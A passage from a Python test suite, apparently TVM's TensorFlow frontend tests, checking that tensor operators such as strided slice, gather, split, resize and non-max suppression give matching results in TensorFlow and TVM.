_test_stridedslice([3, 4, 5, 3], [1, 0], [4, 2], [2, 1], "float32", ellipsis_mask=2)
_test_stridedslice([3, 4, 5, 3], [1, 0, 1], [4, 2, 2], [2, 1, 1], "float32", ellipsis_mask=2)
_test_stridedslice([3, 4, 3], [1, 1, 0], [4, 4, 2], [2, 1, 1], "float32", new_axis_mask=5)
_test_stridedslice(
[3, 4, 3], [1, 1, 1], [4, 4, 1], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=4
)
_test_stridedslice(
[6, 4, 5], [1, 1, 1], [6, 3, 4], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=5
)
_test_stridedslice(
[3, 4, 3], [1, 1, 2], [4, 4, 3], [2, 1, 1], "float32", ellipsis_mask=4, new_axis_mask=2
)
_test_stridedslice(
[3, 4, 3], [1, 1, 2], [4, 4, 3], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=3
)
_test_stridedslice(
[3, 4, 3], [1, 1, 0], [4, 4, 1], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=3
)
_test_stridedslice(
[3, 4, 3], [1, 1, 2], [4, 4, 3], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=2
)
_test_stridedslice((3, 4), [1, 0], [4, 4], [1, 1], "float32", shrink_axis_mask=2)
_test_stridedslice(
[3, 4, 3], [1, 1, 0], [4, 4, 3], [2, 1, 1], "float32", shrink_axis_mask=2, new_axis_mask=2
)
_test_stridedslice(
[3, 4, 3], [1, 1, 0], [4, 4, 3], [2, 1, 1], "float32", shrink_axis_mask=1, new_axis_mask=2
)
_test_stridedslice(
[3, 4, 3], [1, 1, 0], [4, 4, 3], [2, 1, 1], "float32", shrink_axis_mask=2, new_axis_mask=1
)
_test_stridedslice(
[3, 4, 5, 4, 5, 6], [0, 0], [2, 3], [1, 1], "float32", shrink_axis_mask=5, new_axis_mask=1
)
_test_stridedslice(
[3, 4, 5, 4, 5, 6],
[0, 0, 1, 2, 1],
[2, 3, 4, 5, 3],
[1, 1, 2, 2, 1],
"float32",
shrink_axis_mask=5,
new_axis_mask=1,
ellipsis_mask=2,
begin_mask=8,
end_mask=8,
)
_test_stridedslice(
[3, 4, 5, 4, 5, 6],
[0, 0, 1, 2, 1],
[2, 3, 4, 5, 3],
[1, 1, 2, 2, 1],
"float32",
shrink_axis_mask=8,
new_axis_mask=1,
ellipsis_mask=2,
begin_mask=5,
end_mask=5,
)
_test_stridedslice(
[3, 4, 5, 4, 5, 6],
[0, 0, 1, 2, 1],
[2, 3, 4, 5, 3],
[1, 1, 2, 2, 1],
"float32",
shrink_axis_mask=16,
new_axis_mask=1,
ellipsis_mask=2,
begin_mask=5,
end_mask=5,
)
_test_stridedslice(
[3, 4, 5, 4, 5, 6],
[1, 2, 0, -3],
[4, 5, 3, 3],
[2, 2, 1, 1],
"float32",
shrink_axis_mask=8,
new_axis_mask=1,
ellipsis_mask=2,
begin_mask=5,
end_mask=8,
)
_test_stridedslice(
[1, 13, 13, 3, 2],
[0, 0],
[1, 1],
[1, -1],
"float32",
ellipsis_mask=1,
begin_mask=2,
end_mask=2,
)
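# A short illustrative note on the StridedSlice bit masks exercised above (never
# called by the tests); bit i of a mask refers to entry i of begin/end/stride.
# The assertions below use plain NumPy slicing and assume the module-level numpy
# import (np); the helper name is made up for this sketch.
def _strided_slice_mask_examples():
    x = np.arange(24, dtype="float32").reshape(2, 3, 4)
    # shrink_axis_mask: drop the sliced axis, i.e. x[1] instead of x[1:2].
    assert np.array_equal(x[1], x[1:2][0])
    # begin_mask / end_mask: ignore the supplied begin/end for that axis, i.e. x[:, 1:].
    assert x[:, 1:].shape == (2, 2, 4)
    # new_axis_mask: insert a length-1 axis, i.e. x[:, np.newaxis].
    assert x[:, np.newaxis].shape == (2, 1, 3, 4)
    # ellipsis_mask: the marked position stands for all remaining axes, i.e. x[..., 0:2].
    assert x[..., 0:2].shape == (2, 3, 2)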
#######################################################################
# FloorDiv, RealDiv
# -----------------
def _test_forward_divide(ip_shape, dtype):
np_numer = np.random.uniform(-100, 100, size=ip_shape).astype(dtype)
np_denomin = np.random.uniform(1, 100, size=ip_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
numerator = tf.placeholder(dtype, ip_shape, name="numer")
denominator = tf.placeholder(dtype, ip_shape, name="denomin")
tf.math.divide(numerator, denominator, name="RealDiv")
compare_tf_with_tvm([np_numer, np_denomin], ["numer:0", "denomin:0"], "RealDiv:0")
def _test_forward_floordiv(ip_shape, dtype):
np_numer = np.random.uniform(1, 100, size=ip_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
numerator = tf.placeholder(dtype, ip_shape, name="numer")
tf.math.floordiv(numerator, tf.constant(5, dtype=dtype), name="FloorDiv")
compare_tf_with_tvm([np_numer], ["numer:0"], "FloorDiv:0")
def test_forward_divide():
"""test FloorDiv, RealDiv"""
_test_forward_divide((4,), "int32")
_test_forward_divide((4, 3, 7), "float32")
_test_forward_floordiv((4, 3, 7), "float32")
_test_forward_floordiv((4, 3, 7), "int32")
#######################################################################
# FloorMod
# --------
def _test_forward_floormod(in_shape, if_shape, dtype):
np_numer = np.random.uniform(1, 100, size=in_shape).astype(dtype)
np_factor = np.random.uniform(1, 100, size=if_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
numerator = tf.placeholder(dtype, in_shape, name="numer")
factor = tf.placeholder(dtype, if_shape, name="factor")
tf.floormod(numerator, factor, name="FloorMod")
compare_tf_with_tvm([np_numer, np_factor], ["numer:0", "factor:0"], "FloorMod:0")
def test_forward_floormod():
"""test FloorMod"""
_test_forward_floormod((10,), (10,), "float32")
_test_forward_floormod((8, 2), (1,), "float32")
_test_forward_floormod((4, 3, 7), (4, 3, 7), "float32")
_test_forward_floormod((4, 3, 7), (4, 3, 7), "int32")
#######################################################################
# TruncateMod
# -----------
def _test_forward_truncatemod(ip_shape, dtype):
np_data_1 = np.random.uniform(-100, 100, size=ip_shape).astype(dtype)
np_data_2 = np.random.uniform(1, 10, size=ip_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data_1 = tf.placeholder(dtype, ip_shape, name="in_data_1")
in_data_2 = tf.placeholder(dtype, ip_shape, name="in_data_2")
tf.truncatemod(in_data_1, in_data_2, name="truncatemod")
compare_tf_with_tvm([np_data_1, np_data_2], ["in_data_1:0", "in_data_2:0"], "truncatemod:0")
def test_forward_truncatemod():
"""test TruncateMod"""
_test_forward_truncatemod((4, 3, 7), "int32")
#######################################################################
# Gather, GatherV2
# --------------------------
def _test_gather(ip_shape, indice_shape, indice_value, axis, batch_dims, dtype):
"""One iteration of a GatherV2"""
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
indices = tf.placeholder("int32", indice_shape, name="indices")
out = tf.gather(in_data, indices, axis=axis, batch_dims=batch_dims)
np_data = np.random.uniform(1, 10, size=ip_shape).astype(dtype)
        def _fill_indices(indice_value):
            if isinstance(indice_value, int):
                return np.array([indice_value], dtype="int32")
            return np.asarray(indice_value, dtype="int32")
np_indices = _fill_indices(indice_value)
compare_tf_with_tvm([np_data, np_indices], ["in_data:0", "indices:0"], out.name)
def test_forward_gather():
"""test Gather/GatherV2 layer"""
_test_gather((4,), (1,), 1, 0, 1, "int32")
_test_gather((4,), (1,), 1, 0, 0, "float32")
_test_gather((1, 4), (1,), [0], 0, 0, "int32")
_test_gather((4,), (1, 2, 2), [[[1, 0], [0, 1]]], 0, 0, "float32")
_test_gather((2, 2), (1, 2, 2), [[[1, 0], [0, 1]]], 0, 0, "int32")
_test_gather((2, 2), (1, 2, 2), [[[1, 0], [0, 1]]], 1, 0, "int32")
_test_gather((2, 2), (1, 2, 2), [[[1, 0], [0, 1]]], 0, 0, "float32")
_test_gather((3, 3, 3), (1, 1, 2), [[[1, 0]]], 0, 0, "int32")
_test_gather((3, 3, 3), (1, 1, 2), [[[1, 0]]], 2, 0, "int32")
_test_gather((4, 3, 5, 6), (1, 4), [[2, 1, 0, 0]], 0, 0, "float32")
_test_gather((2, 2), (2, 2), [[0, 0], [0, 0]], 1, 1, "float32")
_test_gather(
(2, 2, 3, 6), (2, 2, 3), [[[1, 1, 0], [0, 0, 1]], [[0, 1, 0], [1, 0, 1]]], 2, 2, "float32"
)
_test_gather(
(2, 2, 3, 6), (2, 2, 3), [[[1, 1, 0], [0, 0, 1]], [[0, 1, 0], [1, 0, 1]]], 3, 1, "float32"
)
_test_gather(
(2, 2, 3, 6), (2, 2, 3), [[[1, 1, 0], [0, 0, 1]], [[0, 1, 0], [1, 0, 1]]], 3, 2, "float32"
)
_test_gather(
(2, 2, 3, 6), (2, 2, 3), [[[1, 1, 0], [0, 0, 1]], [[0, 1, 0], [1, 0, 1]]], 3, 0, "float32"
)
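# A reference sketch of tf.gather with batch_dims (illustrative only, never
# called by the tests above), restricted to the simplest batched case
# batch_dims=1, axis=1: every batch row gathers from its own slice of params.
# It assumes the module-level numpy import (np); the helper name is made up for
# this sketch.
def _gather_batch_dims_reference(params, indices, axis=1, batch_dims=1):
    assert axis == 1 and batch_dims == 1, "sketch only covers the simplest batched case"
    return np.stack([params[b][np.asarray(indices[b])] for b in range(params.shape[0])])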
#######################################################################
# GatherND
# --------------------------
def _test_gather_nd(ip_shape, indice_value, dtype):
"""test operator GatherNd"""
np_data = np.random.uniform(1, 100, size=ip_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
tf.gather_nd(in_data, indices=indice_value, name="gather_nd")
compare_tf_with_tvm([np_data], ["in_data:0"], "gather_nd:0")
def test_forward_gather_nd():
"""test operator GatherNd"""
_test_gather_nd((2, 2), [[0, 0], [1, 1]], "float32")
_test_gather_nd((2, 2, 2), [[1, 0, 0], [0, 0, 0]], "float32")
_test_gather_nd((4,), [1], "float32")
_test_gather_nd((4,), [1], "int32")
_test_gather_nd((1, 4), [0, 3], "int32")
_test_gather_nd((2, 2), [[[1, 0], [0, 1]]], "int32")
_test_gather_nd((2, 2), [[[1, 0], [0, 1]]], "float32")
_test_gather_nd((3, 3, 3), [[[1, 0]]], "int32")
_test_gather_nd((3, 3, 3), [[[1, 0]]], "int32")
_test_gather_nd((4, 3, 5, 6), [[2, 1, 0, 0]], "float32")
_test_gather_nd((3, 3, 3), [[[2, 1]]], "int32")
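# A reference sketch of tf.gather_nd (illustrative only, never called by the
# tests above): each innermost row of `indices` addresses a (possibly partial)
# coordinate into params, and the addressed elements or slices are arranged by
# the outer dimensions of `indices`. It assumes the module-level numpy import
# (np); the helper name is made up for this sketch.
def _gather_nd_reference(params, indices):
    params = np.asarray(params)
    indices = np.asarray(indices)
    outer = indices.shape[:-1]
    flat = indices.reshape(-1, indices.shape[-1])
    gathered = np.stack([params[tuple(idx)] for idx in flat])
    return gathered.reshape(outer + params.shape[indices.shape[-1]:])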
#######################################################################
# BiasAdd
# -------
def test_forward_bias_add():
"""test Op BiasAdd"""
    def check_bias_add(lh_shape, rh_shape, dtype):
        tf.reset_default_graph()
        lh_data = np.random.uniform(size=lh_shape).astype(dtype)
rh_data = np.random.uniform(size=rh_shape).astype(dtype)
with tf.Graph().as_default():
lft_data = tf.placeholder(dtype, name="lft_data")
rgt_data = tf.placeholder(dtype, name="rgt_data")
tf.nn.bias_add(lft_data, rgt_data, name="BiasAdd")
compare_tf_with_tvm([lh_data, rh_data], ["lft_data:0", "rgt_data:0"], "BiasAdd:0")
check_bias_add((10, 8, 16, 32), (32,), dtype="int32")
check_bias_add((10, 20), (20,), dtype="float32")
#######################################################################
# Split
# -----
def _test_split(in_shape, axis, num_or_size_splits, dtype):
    """One iteration of a Split"""
    np_data = np.random.uniform(-5, 5, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
num_split = (
len(num_or_size_splits) if isinstance(num_or_size_splits, list) else num_or_size_splits
)
split = tf.split(in_data, num_or_size_splits, axis=axis)
relu = [tf.nn.relu(i) for i in split]
compare_tf_with_tvm([np_data], ["in_data:0"], [n.name for n in relu])
# and now test together with concat
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
splitted = tf.split(in_data, num_or_size_splits, axis=axis)
concat = tf.concat(splitted, axis)
compare_tf_with_tvm([np_data], "in_data:0", concat.name)
def test_forward_split():
"""test split layer"""
# rank 1
_test_split((3,), 0, 1, "float32")
_test_split((3,), 0, 3, "float32")
_test_split((6,), 0, 3, "float32")
# rank 2
_test_split((6, 2), 0, 3, "float32")
_test_split((2, 6), 1, 6, "float32")
# rank 3
_test_split((6, 2, 4), 0, 2, "int32")
_test_split((2, 6, 4), 1, 3, "float32")
_test_split((2, 4, 6), 2, 1, "float32")
# rank 4
_test_split((6, 1, 3, 5), 0, 3, "float32")
_test_split((1, 6, 3, 5), 1, 3, "float32")
_test_split((1, 3, 6, 5), 2, 3, "float32")
_test_split((1, 3, 5, 6), 3, 3, "float32")
# split along negative axis
_test_split((6, 1, 3, 5), -4, 3, "float32")
_test_split((1, 6, 3, 5), -3, 3, "float32")
_test_split((1, 3, 6, 5), -2, 3, "float32")
_test_split((1, 3, 5, 6), -1, 3, "float32")
# size_splits list
_test_split((6,), 0, [1, 2, 3], "int32")
_test_split((3, 6, 4), -2, [1, 4, 1], "float32")
######################################################################
# TopKV2
# ------
def _test_forward_top_k_v2(in_shape, k):
np_data = np.random.uniform(-100, 100, size=in_shape).astype("float32")
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder("float32", in_shape, name="in_data")
tf.math.top_k(in_data, k, name="TopK")
compare_tf_with_tvm([np_data], ["in_data:0"], "TopK:0")
def test_forward_top_k_v2():
_test_forward_top_k_v2((3,), 1)
_test_forward_top_k_v2((3,), 3)
_test_forward_top_k_v2((3, 5, 7), 3)
_test_forward_top_k_v2((3, 5, 7), 3)
#######################################################################
# Unstack
# -------
def _test_unstack(ip_shape, axis, dtype):
np_data = np.random.uniform(-5, 5, size=ip_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
unstack = tf.unstack(in_data, axis=axis)
compare_tf_with_tvm([np_data], ["in_data:0"], [n.name for n in unstack])
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
tf.stack(tf.unstack(in_data, axis=axis), axis=axis)
compare_tf_with_tvm([np_data], ["in_data:0"], "stack:0")
def test_forward_unstack():
"""test unstack layer"""
_test_unstack((6,), 0, "int32")
_test_unstack((2, 6), 1, "float64")
# negative axis
_test_unstack((1, 4), -1, "int32")
_test_unstack((3, 6, 4), -2, "float32")
#######################################################################
# Tile
# ----
def _test_tile(in_shape, multiples, dtype):
np_data = np.random.uniform(-5, 5, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
tf.tile(in_data, multiples=multiples, name="tile")
compare_tf_with_tvm([np_data], ["in_data:0"], "tile:0")
def test_forward_tile():
"""test Tile"""
_test_tile((2,), (3,), "int32")
_test_tile((2, 2), (2, 3), "float32")
_test_tile((2, 4, 6), (6, 7, 8), "float64")
#######################################################################
# ClipByValue
# -----------
def _test_forward_clip_by_value(ip_shape, clip_value_min, clip_value_max, dtype):
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
tf.clip_by_value(in_data, clip_value_min, clip_value_max, name="ClipByValue")
np_data = np.random.uniform(-100, 100, size=ip_shape).astype(dtype)
compare_tf_with_tvm([np_data], ["in_data:0"], "ClipByValue:0")
def test_forward_clip_by_value():
"""test ClipByValue op"""
    if LooseVersion(tf.__version__) < LooseVersion("1.9"):
_test_forward_clip_by_value((4,), 0.1, 5.0, "float32")
_test_forward_clip_by_value((4, 4), 1, 5, "int32")
#######################################################################
# Multi Input to graph
# --------------------
def test_forward_multi_input():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.int32, shape=[3, 3], name="in1")
in2 = tf.placeholder(tf.int32, shape=[3, 3], name="in2")
in3 = tf.placeholder(tf.int32, shape=[3, 3], name="in3")
in4 = tf.placeholder(tf.int32, shape=[3, 3], name="in4")
out1 = tf.add(in1, in2, name="out1")
out2 = tf.subtract(in3, in4, name="out2")
out = tf.multiply(out1, out2, name="out")
in_data = np.arange(9, dtype="int32").reshape([3, 3])
compare_tf_with_tvm(
[in_data, in_data, in_data, in_data], ["in1:0", "in2:0", "in3:0", "in4:0"], "out:0"
)
#######################################################################
# Multi Output to Graph
# ---------------------
def test_forward_multi_output():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.int32, shape=[3, 3], name="in1")
in2 = tf.placeholder(tf.int32, shape=[3, 3], name="in2")
in3 = tf.placeholder(tf.int32, shape=[3, 3], name="in3")
in4 = tf.placeholder(tf.int32, shape=[3, 3], name="in4")
out1 = tf.add(in1, in2, name="out1")
out2 = tf.subtract(in3, in4, name="out2")
in_data = np.arange(9, dtype="int32").reshape([3, 3])
in_data = [in_data] * 4
in_name = ["in1:0", "in2:0", "in3:0", "in4:0"]
out_name = ["out1:0", "out2:0"]
out_node = [out.strip(":0") for out in out_name]
in_node = [inp.strip(":0") for inp in in_name]
with tf.Session() as sess:
final_graph_def = tf.graph_util.convert_variables_to_constants(
sess,
sess.graph.as_graph_def(add_shapes=True),
out_node,
)
tf_output = run_tf_graph(sess, in_data, in_name, out_name)
tvm_output = run_tvm_graph(
final_graph_def, in_data, in_node, target="llvm", out_names=out_node, num_output=2
)
for i in range(len(tf_output)):
tvm.testing.assert_allclose(tf_output[i], tvm_output[i], atol=1e-5, rtol=1e-5)
#######################################################################
# Resize Bilinear, Nearest_Neighbor
# ---------------------------------
def _test_resize_bilinear(in_shape, to_shape, align_corners):
"""One iteration of resize bilinear"""
data = np.random.uniform(size=in_shape).astype("float32")
shape_data = np.array(to_shape).astype("int32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
shape_data = constant_op.constant(
shape_data, shape=shape_data.shape, dtype=shape_data.dtype
)
tf.image.resize_bilinear(in_data, shape_data, align_corners=align_corners)
compare_tf_with_tvm(data, "Placeholder:0", "ResizeBilinear:0")
def _test_resize_bilinear_from_tensor(in_shape, align_corners):
"""One iteration of resize bilinear with non-constant output shape, requires
value inference to get proper output shape."""
data = np.random.uniform(size=in_shape).astype("float32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(
shape=[in_shape[0], None, None, in_shape[3]], dtype=data.dtype
)
to_shape = tf.shape(in_data)[1:3]
tf.image.resize_bilinear(in_data, to_shape, align_corners=align_corners)
compare_tf_with_tvm(data, "Placeholder:0", "ResizeBilinear:0")
def _test_resize_nearest_neighbor(in_shape, to_shape):
"""One iteration of resize nearest neighbor"""
data = np.random.uniform(size=in_shape).astype("float32")
shape_data = np.array(to_shape).astype("int32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
shape_data = constant_op.constant(
shape_data, shape=shape_data.shape, dtype=shape_data.dtype
)
tf.image.resize_nearest_neighbor(in_data, shape_data, name="resize_nearest_neighbor")
compare_tf_with_tvm(data, "Placeholder:0", "resize_nearest_neighbor:0")
def _test_resize_nearest_neighbor_dynamic_shape(in_shape, scale):
"""One iteration of resize nearest neighbor for graph with dynamic input shape"""
data = np.random.uniform(size=in_shape).astype("float32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=None, dtype=data.dtype)
# multiply input shape by scale factor
new_shape = tf.shape(in_data)[1:3] * tf.constant(scale, dtype=tf.int32)
tf.image.resize_nearest_neighbor(in_data, new_shape, name="resize_nearest_neighbor")
compare_tf_with_tvm(data, "Placeholder:0", "resize_nearest_neighbor:0")
def test_forward_resize():
"""Resize Bilinear, Nearest_Neighbor"""
# TF default layout is NHWC
_test_resize_bilinear((4, 32, 32, 3), [50, 50], False)
_test_resize_bilinear((6, 32, 32, 3), [20, 20], True)
_test_resize_bilinear_from_tensor((4, 32, 32, 3), False)
_test_resize_bilinear_from_tensor((6, 50, 50, 3), True)
_test_resize_nearest_neighbor((6, 32, 32, 3), [20, 20])
_test_resize_nearest_neighbor_dynamic_shape((1, 16, 16, 3), scale=[2, 2])
#######################################################################
# BroadcastArgs
# -----------
def _test_broadcast_args(in_shape_1, in_shape_2):
"""One iteration of broadcast_args"""
shape_1 = np.array(in_shape_1).astype("int32")
shape_2 = np.array(in_shape_2).astype("int32")
with tf.Graph().as_default():
shape_1 = constant_op.constant(shape_1, shape=shape_1.shape, dtype=shape_1.dtype)
shape_2 = constant_op.constant(shape_2, shape=shape_2.shape, dtype=shape_2.dtype)
tf.raw_ops.BroadcastArgs(s0=shape_1, s1=shape_2)
compare_tf_with_tvm(None, "", "BroadcastArgs:0", opt_level=0)
def test_forward_broadcast_args():
"""Resize Bilinear"""
_test_broadcast_args((4, 1, 32, 32), [4, 8, 32, 32])
_test_broadcast_args((6, 32, 32, 1), [6, 32, 32, 16])
_test_broadcast_args((32, 32, 16), [6, 32, 32, 16])
#######################################################################
# BroadcastTo
# -----------
def _test_broadcast_to(in_shape, to_shape):
"""One iteration of broadcast_to"""
data = np.random.uniform(size=in_shape).astype("float32")
shape_data = np.array(to_shape).astype("int32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
shape_data = constant_op.constant(
shape_data, shape=shape_data.shape, dtype=shape_data.dtype
)
tf.broadcast_to(in_data, shape_data)
compare_tf_with_tvm(data, "Placeholder:0", "BroadcastTo:0", opt_level=0)
def _test_broadcast_to_from_tensor(in_shape):
"""One iteration of broadcast_to with unknown shape at graph build"""
data = np.random.uniform(size=in_shape).astype("float32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=[None], dtype=data.dtype)
shape_data = tf.multiply(tf.shape(in_data), 32)
tf.broadcast_to(in_data, shape_data)
compare_tf_with_tvm(data, "Placeholder:0", "BroadcastTo:0")
def test_forward_broadcast_to():
"""Resize Bilinear"""
_test_broadcast_to((4, 1, 32, 32), [4, 8, 32, 32])
_test_broadcast_to((6, 32, 32, 1), [6, 32, 32, 16])
    _test_broadcast_to_from_tensor((1,))
#######################################################################
# Fill
# ----
def _test_fill(in_shape):
"""Use the fill op to create a tensor of ones with non-constant shape."""
with tf.Graph().as_default():
tf.ones(shape=in_shape, dtype="float32")
compare_tf_with_tvm(in_shape, [], "ones:0", opt_level=1)
def _test_fill_from_tensor(in_shape):
"""Use the fill op to create a tensor of ones with non-constant shape.
Some extra ops need to be added here to prevent the graph from
being fully constant and folded away."""
data = np.random.uniform(size=in_shape).astype("float32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(
shape=[in_shape[0], in_shape[1], None, None], dtype=data.dtype
)
x = tf.ones(shape=2 * tf.shape(in_data), dtype=data.dtype)
y = tf.math.add(in_data, tf.reduce_mean(x), name="out1")
compare_tf_with_tvm(data, "Placeholder:0", "out1:0")
def _test_fill_symbolic_inputs(in_shape_data, in_value_data, dtype):
with tf.Graph().as_default():
in_shape = tf.placeholder(shape=[in_shape_data.shape[0]], dtype=in_shape_data.dtype)
in_value = tf.placeholder(shape=(), dtype=dtype)
out = tf.fill(in_shape, in_value)
for mode in ["debug", "vm"]:
compare_tf_with_tvm(
[in_shape_data, in_value_data], [in_shape.name, in_value.name], out.name, mode=mode
)
def test_forward_fill():
"""Resize Bilinear"""
    _test_fill((32,))
_test_fill((6, 32, 64, 64))
_test_fill_from_tensor((6, 32, 64, 64))
_test_fill_symbolic_inputs(np.array((2,)), np.int32(9), tf.int32)
_test_fill_symbolic_inputs(np.array((2, 3)), 9, tf.int64)
_test_fill_symbolic_inputs(np.array((2, 3, 4)), np.float32(9.0), tf.float32)
#######################################################################
# Crop to bounding box
# --------------------
def _test_crop(in_shape, off_h, off_w, tar_h, tar_w):
"""Crop to bounding box"""
data = np.random.uniform(size=in_shape).astype("float32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
tf.image.crop_to_bounding_box(in_data, off_h, off_w, tar_h, tar_w)
compare_tf_with_tvm(data, "Placeholder:0", "crop_to_bounding_box/Slice:0")
def test_forward_crop():
"""Crop to bounding box"""
_test_crop((1, 224, 224, 3), 20, 20, 120, 120)
#######################################################################
# CropAndResize
# -------------
def _test_forward_crop_and_resize(
img_shape,
boxes,
box_idx,
crop_size,
extrapolation_value=0.0,
method="bilinear",
dtype="float32",
):
image = np.random.uniform(0, 10, size=img_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = array_ops.placeholder(dtype, image.shape, name="in_data")
tf.image.crop_and_resize(
in_data,
boxes=boxes,
box_ind=box_idx,
crop_size=crop_size,
method=method,
extrapolation_value=extrapolation_value,
name="crop_and_resize",
)
compare_tf_with_tvm([image], ["in_data:0"], "crop_and_resize:0")
def test_forward_crop_and_resize():
"""CropAndResize"""
_test_forward_crop_and_resize([1, 6, 6, 3], [[0, 0, 1, 1]], [0], [3, 3])
_test_forward_crop_and_resize([1, 6, 6, 3], [[0, 0, 1, 1]], [0], [3, 3], 0.2)
_test_forward_crop_and_resize([1, 6, 6, 3], [[0, 0, 1, 1]], [0], [3, 3], 0.2, "nearest")
_test_forward_crop_and_resize([1, 11, 11, 3], [[0.3, 0.3, 1, 1]], [0], [21, 21])
_test_forward_crop_and_resize([1, 41, 41, 3], [[0.2, 0.4, 0.8, 0.8]], [0], [21, 11])
_test_forward_crop_and_resize([1, 100, 100, 3], [[0, 0, 0.9, 0.9]], [0], [30, 30])
_test_forward_crop_and_resize([1, 224, 224, 3], [[0.1, 0.2, 1, 1]], [0], [9, 9])
_test_forward_crop_and_resize([1, 249, 249, 3], [[0, 0, 1, 1]], [0], [9, 9])
_test_forward_crop_and_resize([1, 201, 301, 3], [[0.2, 0.3, 0.7, 0.8]], [0], [51, 51])
_test_forward_crop_and_resize(
img_shape=[10, 11, 11, 3],
boxes=[[0, 0, 0.9, 0.9], [0.2, 0.2, 0.8, 0.8]],
box_idx=[0, 1],
crop_size=[5, 5],
)
_test_forward_crop_and_resize(
img_shape=[20, 576, 576, 3],
boxes=[[0, 0, 1, 1], [0, 0, 0.8, 0.8], [0.1, 0.2, 0.9, 1], [0.2, 0, 1, 1]],
box_idx=[1, 0, 2, 3],
crop_size=[24, 24],
extrapolation_value=0.3,
)
_test_forward_crop_and_resize(
img_shape=[20, 229, 229, 3],
boxes=[[0, 0, 0.9, 0.9], [0.3, 0.3, 1, 1], [0.2, 0.1, 0.7, 0.8], [0, 0, 1, 1]],
box_idx=[3, 0, 2, 1],
crop_size=[58, 58],
extrapolation_value=0.2,
method="nearest",
)
#######################################################################
# Non Max Suppression
# -------------------
def _test_forward_nms_v3(
bx_shape, score_shape, iou_threshold, score_threshold, out_size, dtype="float32"
):
boxes = np.random.uniform(0, 10, size=bx_shape).astype(dtype)
scores = np.random.uniform(size=score_shape).astype(dtype)
max_output_size = np.int32(out_size)
tf.reset_default_graph()
in_data_1 = tf.placeholder(dtype, boxes.shape, name="in_data_1")
in_data_2 = tf.placeholder(dtype, scores.shape, name="in_data_2")
in_data_3 = tf.placeholder(tf.int32, name="in_data_3")
tf.image.non_max_suppression(
boxes=in_data_1,
scores=in_data_2,
max_output_size=in_data_3,
iou_threshold=iou_threshold,
score_threshold=score_threshold,
name="nms",
)
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
"nms/NonMaxSuppressionV3:0",
mode="vm",
)
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
"nms/NonMaxSuppressionV3:0",
mode="debug",
)
def _test_forward_nms_v4(
bx_shape, score_shape, iou_threshold, score_threshold, out_size, dtype="float32"
):
boxes = np.random.uniform(0, 10, size=bx_shape).astype(dtype)
scores = np.random.uniform(size=score_shape).astype(dtype)
max_output_size = np.int32(out_size)
tf.reset_default_graph()
in_data_1 = tf.placeholder(dtype, boxes.shape, name="in_data_1")
in_data_2 = tf.placeholder(dtype, scores.shape, name="in_data_2")
in_data_3 = tf.placeholder(tf.int32, name="in_data_3")
indices_padded, num_valid = tf.image.non_max_suppression_padded(
boxes=in_data_1,
scores=in_data_2,
max_output_size=in_data_3,
iou_threshold=iou_threshold,
score_threshold=score_threshold,
name="nms",
pad_to_max_output_size=True,
)
num_valid = tf.reshape(num_valid, shape=(-1,))
indices_padded = tf.reshape(indices_padded, shape=(-1,))
tf.slice(indices_padded, tf.constant([0]), num_valid, name="SlicedIndices")
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
["nms/NonMaxSuppressionV4:1", "SlicedIndices:0"],
mode="vm",
)
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
["nms/NonMaxSuppressionV4:1", "SlicedIndices:0"],
mode="debug",
)
def _test_forward_nms_v5(
bx_shape, score_shape, iou_threshold, score_threshold, out_size, dtype="float32"
):
boxes = np.random.uniform(0, 10, size=bx_shape).astype(dtype)
scores = np.random.uniform(size=score_shape).astype(dtype)
max_output_size = np.int32(out_size)
tf.reset_default_graph()
in_data_1 = tf.placeholder(dtype, boxes.shape, name="in_data_1")
in_data_2 = tf.placeholder(dtype, scores.shape, name="in_data_2")
in_data_3 = tf.placeholder(tf.int32, name="in_data_3")
tf.image.non_max_suppression_with_scores(
boxes=in_data_1,
scores=in_data_2,
max_output_size=in_data_3,
iou_threshold=iou_threshold,
score_threshold=score_threshold,
